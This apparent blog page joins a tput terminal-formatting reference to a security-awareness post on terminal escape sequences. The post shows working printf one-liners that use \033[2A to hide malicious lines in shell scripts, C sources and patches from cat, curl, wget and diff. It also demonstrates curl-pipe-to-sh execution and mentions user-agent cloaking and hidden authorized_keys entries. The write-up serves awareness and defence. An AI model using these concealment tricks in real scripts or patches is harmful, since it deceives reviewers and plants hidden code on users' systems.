BASH i okolice

Here is some more detail on the awesome tput command suggested in Ignacio's answer.

# Set the background colour using ANSI escape
tput setab [1-7]
# Set the foreground colour using ANSI escape
tput setaf [1-7]

Colours are as follows:

Num  Colour    #define         RGB

0    black     COLOR_BLACK     0,0,0
1    red       COLOR_RED       max,0,0
2    green     COLOR_GREEN     0,max,0
3    yellow    COLOR_YELLOW    max,max,0
4    blue      COLOR_BLUE      0,0,max
5    magenta   COLOR_MAGENTA   max,0,max
6    cyan      COLOR_CYAN      0,max,max
7    white     COLOR_WHITE     max,max,max

There are also non-ANSI versions of the colour setting functions (setb instead of setab, and setf instead of setaf) which use different numbers, not given here.

tput bold    # Select bold mode
tput dim     # Select dim (half-bright) mode
tput smul    # Enable underline mode
tput rmul    # Disable underline mode
tput rev     # Turn on reverse video mode
tput smso    # Enter standout (bold) mode
tput rmso    # Exit standout mode
tput sgr 0   # Reset all attributes

tput cup Y X # Move cursor to screen postion X,Y (top left is 0,0)
tput cuf N   # Move N characters forward (right)
tput cub N   # Move N characters back (left)
tput cuu N   # Move N lines up
tput ll      # Move to last line, first column (if no cup)
tput sc      # Save the cursor position
tput rc      # Restore the cursor position
tput lines   # Output the number of lines of the terminal
tput cols    # Output the number of columns of the terminal

tput ech N   # Erase N characters
tput clear   # Clear screen and move the cursor to 0,0
tput el 1    # Clear to beginning of line
tput el      # Clear to end of line
tput ed      # Clear to end of screen
tput ich N   # Insert N characters (moves rest of line forward!)
tput il N    # Insert N lines

tput bel     # play a bell

With compiz wobbly windows, the bel command makes the terminal wobble for a second to draw the user's attention.

echo „$(tput setaf 1)Red text $(tput setab 7)and white background$(tput sgr 0)” Looks like this on my Ubuntu terminal:

Use command sgr 0 to reset the colour at the end.

tput accepts scripts containing one command per line, which are executed in order before tput exits.

Avoid temporary files by echoing a multiline string and piping it:

echo -e "setf 7\nsetb 1" | tput -S  # set fg white and bg red

• See man 1 tput
• See man 5 terminfo for the complete list of commands and more details on these options. (The corresponding tput command is listed in the Cap-name column of the huge table that starts at line 81.)

http://www.cyberciti.biz/faq/how-to-wakeup-backup-nas-server-and-mirror-files-using-rsync-in-linux/

So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?"

This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.

How it technically works:

A terminal escape sequence is a special sequence of characters that is printed (like any other text).

If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.

While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.

$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho  
doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!

As you can see, our beloved cat cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action. And this action moves the cursor up X times, overwriting what is above it X lines. But this doesn't affect only 'cat', it affects everything that
interprets escape sequences.

$ head backdoor.sh
#!/bin/bash
echo doing something very nice!
 
$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!
 
$ more backdoor.sh
#!/bin/bash
echo doing something very nice!

It's not over yet!

$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
 
$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!

But if we pipe it into a shell…

$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!
 
$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!

You might be thinking „If I opened that in my browser, I would detect it being malicious!”

Well, think again…

One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then.

I wouldn't even be surprised if most of those install scripts that make use of these pipe into sh bullcrap abused this.

I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files…

It's no secret, most of us rely on cat to view files. I guess this is one black kitty, giving you bad luck.

Here's another example with a .c file

$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing  
something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do  
much... */\n\tprintf("doing something very nice\\n");\n\treturn  
0;\n}\n' > nice.c
$ cat nice.c
#include <stdio.h>
 
int main()
{
	/* This simple program doesnt do much... */
	printf("doing something very nice\n");
	return 0;
}

$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice

diff also interprets escape sequences and so do the resulting patches

Going back to the first example, imagine I have a backdoored.sh that is backdoored, and a legit.sh that does what it's output tells us.

$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!
 
$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!
 
 
$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh	2015-09-17 16:25:42.985349535 +0100
+++ legit.sh	2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
  #!/bin/bash
-echo doing something very nice!
+echo doing something very nice!
 
$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!

less doesn't interpret escape sequences unless the -r switch is used, so stop aliasing it to less -r just because there's no colored output.

s/party/hack like it's 1999